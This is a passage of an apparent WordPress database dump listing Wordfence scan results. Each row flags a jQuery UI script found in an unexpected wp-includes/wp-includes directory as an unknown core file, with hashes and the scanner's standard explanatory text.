wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27222,1631424911,1631424911,'new','knownfile',75,'0dfdf6b050ccc30e7cf14807bfd6de9b','56dfc0c07c9e61f9c4123c661fd4700e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27223,1631424911,1631424911,'new','knownfile',75,'ed1496288d7d9b0212e8920610afc2af','9089ea86c0333513b5e746cbac25c173','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/suggest.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/suggest.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27224,1631424911,1631424911,'new','knownfile',75,'ec2db57b1d23f60f960e0e5e870f724f','fb779578816bc3af82b58f8397449292','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/suggest.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/suggest.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27225,1631424911,1631424911,'new','knownfile',75,'9df65606190b4ad69d55925482cd9d50','837069c3c91f47003c358234e58b2d55','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/accordion.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/accordion.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27226,1631424912,1631424912,'new','knownfile',75,'4a76c53c2862392d885fcc49cad5fb54','0c1423bfcd1567d5cecdf973dd4fb041','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/accordion.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/accordion.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27227,1631424912,1631424912,'new','knownfile',75,'dc316159c8b502e20963b95327d676e9','72b63bb26009516e7cd2fadc45ccf098','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/autocomplete.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/autocomplete.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27228,1631424912,1631424912,'new','knownfile',75,'81e57f425c08fa419201e5a564ca26df','ecef63e38f2436b6cc159e743d5e589d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27229,1631424912,1631424912,'new','knownfile',75,'a36e1763140b2f9d2a2bb986768a9ab3','086775fc2e7cbeaa279e822b13c94b1c','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/button.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/button.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27230,1631424913,1631424913,'new','knownfile',75,'8ec810903bdaaf841ea13783250d4502','91c66865117c09f56b3621f56ec81d80','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/button.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/button.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27231,1631424913,1631424913,'new','knownfile',75,'650c52abc5066d8b15547b1af58563e9','46b01e0c51f1a2326dbb59aeb1cf82d3','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/checkboxradio.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/checkboxradio.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27232,1631424913,1631424913,'new','knownfile',75,'6aa5fd4b7509ac81b0ecf9a99af78736','a87c4384383a83e47d0a578518eb3893','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27233,1631424913,1631424913,'new','knownfile',75,'e34ef1bbfd09d36dcb9ec99fef2f9c65','035c016f37c2ff47263e517a433fc80f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/controlgroup.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/controlgroup.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27234,1631424913,1631424913,'new','knownfile',75,'07943477864869f93d2acdf93f132e99','20c71a970edd0923f0efa5d82d6e4a11','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27235,1631424913,1631424913,'new','knownfile',75,'0163a00cd1c9521237898cb2f8069e36','94d5179b54f91b49edeb32521978da43','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/core.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/ui/core.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27236,1631424913,1631424913,'new','knownfile',75,'1ef73377ea1b807bf4091949c54f8d84','907472e61c099cc9960d57768287926b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/core.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/ui/core.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27237,1631424913,1631424913,'new','knownfile',75,'c725989ae29016de28cdfe6fa6e781b7','d3f27f8d05d1b58c355e96d3e61e9e4d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/datepicker.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/datepicker.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27238,1631424913,1631424913,'new','knownfile',75,'d04847ca26db9d5025033372808dda32','e1aa793f2c2ed4451e5d4a036a53f903','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/datepicker.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/datepicker.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27239,1631424913,1631424913,'new','knownfile',75,'e28d214708ef162840e403b1cf2ac55f','03dd768c7082fafd04758961526b5438','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/dialog.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/dialog.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27240,1631424913,1631424913,'new','knownfile',75,'73739fd4fa8a87ab77bc54cb66fdabf2','bcb98aed8f862b27e52225cecb1e7bc7','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/dialog.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/dialog.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27241,1631424913,1631424913,'new','knownfile',75,'2f47f1ea252598ad0972e5fe4fa0b6bb','ad312bd69135a66f25d009cb2982aea4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/draggable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/draggable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27242,1631424913,1631424913,'new','knownfile',75,'08807b82d2d70492d2853add9ab72095','e2774b15951bf4009ceea44a9d491af1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/draggable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/draggable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27243,1631424913,1631424913,'new','knownfile',75,'471534b067fbd1989891280f48debb48','5661e63c607ce63486b83ed5413a5193','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/droppable.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/droppable.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27244,1631424913,1631424913,'new','knownfile',75,'5e6abbb91dc68290645d4919cfcd405b','d76f0131b4bf89c292db210ee5c47e87','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/droppable.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/droppable.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27245,1631424914,1631424914,'new','knownfile',75,'be299856cb84df8cf2d4b4b6b26efca3','e57ef583db84b17bd1c5267d0dfb253f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-blind.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/effect-blind.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27246,1631424914,1631424914,'new','knownfile',75,'6428d8809c0b38e135bd54cd4c474f7f','d0686bf29019c0ed99eaccc185de88df','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27247,1631424914,1631424914,'new','knownfile',75,'720d337c9492eb0255fefddc84f8df1c','c32fdfeaeee07b65212b5660e30ead77','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-bounce.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/effect-bounce.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27248,1631424914,1631424914,'new','knownfile',75,'b5a1a75b9d234a82ab974be7e21ee974','a0174b22d4cf82b74ff4ccd606909a11','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27249,1631424914,1631424914,'new','knownfile',75,'617928190a61cf7c1f30ba0bb0824cb2','43ff2f8954aefda7dc245883297bfa07','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-clip.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-clip.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27250,1631424914,1631424914,'new','knownfile',75,'da56661cc628329f68b9fd1f22c6685e','7ea1bf1f05dac090e9a410c5649db402','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-clip.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27251,1631424914,1631424914,'new','knownfile',75,'70540802e4790e7b361d0a3dad1fd1b5','f14849db960adfe861f8eff004ecf5ea','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-drop.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-drop.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27252,1631424914,1631424914,'new','knownfile',75,'62124a5242c600dc02789528601ce3ed','8060612cc97f3cca61ab7bc3d31d7dd5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27253,1631424914,1631424914,'new','knownfile',75,'4176eca2d7996f62da4b6b52420924f4','8fede1b43b677e48276cb5f17b7e6790','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-explode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/jquery/ui/effect-explode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27254,1631424914,1631424914,'new','knownfile',75,'e592e5afe1a1fbd57b4f13845d72f4c4','463a57ac13dd3a85f71f34c06f1b1387','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27255,1631424914,1631424914,'new','knownfile',75,'a595bc9070e15cb849bce96763581552','7848bc5fce3a1d5d0d096add814adccc','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fade.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-fade.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27256,1631424914,1631424914,'new','knownfile',75,'2b577027723cf6d53114dcc70853eae1','27948325674b7a28dffce5026e05b188','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27257,1631424914,1631424914,'new','knownfile',75,'699bd5668e60b6dc8b202007288ee440','751d03d63c707f1be366aeb7e21d2a39','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fold.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/ui/effect-fold.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27258,1631424914,1631424914,'new','knownfile',75,'b75d2e0689be54ef3eec39087c3b5d12','936eb42a4233b026b367c4b166eeeb25','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/ui/effect-fold.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27259,1631424914,1631424914,'new','knownfile',75,'dc5d63cf5c538e6fb1d66fccd9aa4b80','11be3c2190882a88ddac3fa0d1cacd58','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-highlight.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/effect-highlight.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27260,1631424915,1631424915,'new','knownfile',75,'0a448c26b216f8a71efdec7ba2c32a94','eac4452916aa5091f4b05a729f816603','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 